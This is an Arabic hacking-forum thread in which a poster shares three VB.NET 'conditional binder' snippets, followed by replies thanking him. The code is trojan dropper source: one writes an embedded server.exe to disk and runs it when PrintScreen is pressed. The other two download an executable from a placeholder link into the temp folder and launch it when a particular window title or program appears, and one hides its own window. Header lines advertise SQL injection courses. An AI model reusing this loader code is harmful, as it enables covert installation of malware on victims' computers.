1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ تلغيم ] شرح ثلاثه تلغيمات شرطية

الموضوع في 'حماية الأجهزة' بواسطة KaDiM aL-iRaQi, بتاريخ ‏5 يناير 2015.

كاتب الموضوع : KaDiM aL-iRaQi المشاهدات : 2,748 الردود : 41 ‏5 يناير 2015
حالة الموضوع:
مغلق
  1. غير متصل

    KaDiM aL-iRaQi ExpertDeveloper
    ExpErt DeveloPer

    عضو منذ:
    ‏2 سبتمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    24
    نقاط الجائزة:

    [​IMG]
    [​IMG]


    بسَم الله الرحمِن الرحيَم ، السَلام عليكِم ورحمَة الله وبركِاتة

    انِ الحمَد لله نحمَده و نستعِينه ونستغِفره و نعِوذ بالله مَن شروَر انفسِنا

    و سيَئات اعمِالنا مَن يهَده الله فلاِ مضَل لهِ و مَن يضِلل فلاِ هادِي لهَ ،





    شلونكم آعضاء وزوار منتدى عراق تيم أنشاء الله بخير


    آليوم اطرح لكم شرح 3 تلغيمات شرطيه جديده



    آنشاء الله تعجبكم

    [​IMG]


    آلتلغيمه الاولى

    عند التقاط صوره لسطح المكتب يتم تشغيل السيرفر :


    لمشاهده الشرح على اليوتوب ..
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]

    ألكــود ::


    [C#]Public Class Form1
    Public Declare Function GetAsyncKeyState Lib "user32.dll" (ByVal key As Integer) As Integer
    Dim kadim As Boolean
    Private Sub Form1_Load(ByVal sender As Object, ByVal e As EventArgs) Handles MyBase.Load
    Timer1.Start()
    End Sub
    Private Sub Timer1_Tick(ByVal sender As Object, ByVal e As EventArgs) Handles Timer1.Tick
    On Error Resume Next
    kadim = GetAsyncKeyState(Keys.PrintScreen) '<
    If kadim = True Then
    Text = "kadim"
    End If
    If Text = "kadim" Then
    Timer1.Stop()


    Dim KADIM As String = KADIM + "server.exe"
    IO.File.WriteAllBytes(KADIM, My.Resources.server)
    Process.Start(KADIM)


    End If
    End Sub
    End Class
    [/C#]
    [​IMG]



    التلـغيمه ألثـأنيــه


    : عند الدخول لقسم في منتدى مثل " ديف بيونت " او " عراق تيم "


    مثل قسم " حمأيه الاجهزه " يتم ختيار اي قسم .. يتم تشغيل السيرفر


    لمشأهده الشرح على اليوتوب


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]

    الكـود

    كود:
    Public Class Form1
        Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
            Timer1.Start()
        End Sub
        Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
            Dim KADIM As New Process
            For Each KADIM In Process.GetProcesses
                If KADIM.MainWindowTitle.Contains("ختيار القسم") Then
                 Dim web As New System.Net.WebClient
            web.DownloadFile("رابط السيرفر المباشر", Environ("tmp") & "/اسم السيرفر مع الصيغه")
            Shell(Environ("tmp") & "/اسم السيرفر مع الصيغه")
                End If
            Next
        End Sub
    End Class
    
    [​IMG]

    التلغيمه الثالثه


    عند فتح برنامج معين مثل " لايت سي " أو " سكايب " يتم ختياره انت يتم تشغيل السيرفر


    لمشاهده الشرح على اليوتوب



    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    الكـود




    [C#]
    Public Class Form1
    Private Sub Form1_Load(ByVal sender As Object, ByVal e As EventArgs) Handles MyBase.Load
    Me.Hide()
    Me.ShowIcon = False
    Me.ShowInTaskbar = False
    Opacity = 0
    Timer1.Start()
    End Sub
    Private Sub Timer1_Tick(ByVal sender As Object, ByVal e As EventArgs) Handles Timer1.Tick
    Dim kadim() As Process = System.Diagnostics.Process.GetProcessesByName("VClient")
    For Each VO As Process In kadim
    Timer1.Stop()
    Text = "KADIM - ALIRAQI "
    Next
    If Text = "KADIM - ALIRAQI " Then
    Dim web As New System.Net.WebClient
    web.DownloadFile("رابط السيرفر المباشر", Environ("tmp") & "/server.exe")
    Shell(Environ("tmp") & "/server.exe")
    End If
    End Sub
    End Class​
    [/C#]​

    [​IMG]
    لتحميل جميـع ألاكوآد


    آضغـط هنــأ
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]




    الاهداء الى الجميـع



    فـــي أمـأن الــلــه

    {1!$7}{1!$7}{1!$7}{1!$7}{1!$7}{1!$7}{1!$7}{1!$7}{1!$7}


    [​IMG]
     


    1 person likes this.
    جاري تحميل الصفحة...
  2. غير متصل

    مصطفى القاضي
    rank
    Developer

    عضو منذ:
    ‏5 يناير 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    (( حـزب اللـه ))
    الإقامة:

    رد: شرح ثلاثه تلغيمات شرطية

    عاشت ايدك حبيبي كاظم
     


  3. غير متصل

    DarKMaSTer
    rank
    Developer

    عضو منذ:
    ‏16 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    HACKER
    الإقامة:

    رد: شرح ثلاثه تلغيمات شرطية

    الله يعطيك العافية تسلم حبيبي
     


  4. غير متصل

    HacKeR 8
    rank
    Developer

    عضو منذ:
    ‏25 فبراير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: شرح ثلاثه تلغيمات شرطية

    #عاشت الأيادي على هذا المجهود الرائع
     


  5. غير متصل

    Tr0J4n
    rank
    ExpErt DeveloPer

    عضو منذ:
    ‏3 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: شرح ثلاثه تلغيمات شرطية

    بارك الله فيك يا غالي
     


  6. غير متصل

    Dr.Sh$ll
    rankrank
    Developer

    عضو منذ:
    ‏11 مايو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    8
    نقاط الجائزة:
    الإقامة:

    رد: شرح ثلاثه تلغيمات شرطية

    الله يعطيك الف عافية يا غالي على هذا المجهود
     


  7. غير متصل

    Dr.Sh$ll
    rankrank
    Developer

    عضو منذ:
    ‏11 مايو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    8
    نقاط الجائزة:
    الإقامة:

    رد: شرح ثلاثه تلغيمات شرطية

    ماذا تعتقد في مشاركة KaDiM aL-iRaQi؟يعجبني ويستحق التقييم
     


  8. غير متصل

    AZD ALIRAQI
    Developer

    عضو منذ:
    ‏31 ديسمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    رد: شرح ثلاثه تلغيمات شرطية

    عاشت ايدك
    دومك مبدع ​
     


  9. غير متصل

    ألملازم محمد ألعراقي
    V • I • P

    عضو منذ:
    ‏24 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    24
    نقاط الجائزة:

    رد: شرح ثلاثه تلغيمات شرطية

    السلام عليكم

    بارك الله بيك حبي

    واصل يا بطل

     


  10. غير متصل

    PayPal
    rankrank
    Developer

    عضو منذ:
    ‏22 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: شرح ثلاثه تلغيمات شرطية

    تسلم أيدك يا بطل ^[​IMG]^
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...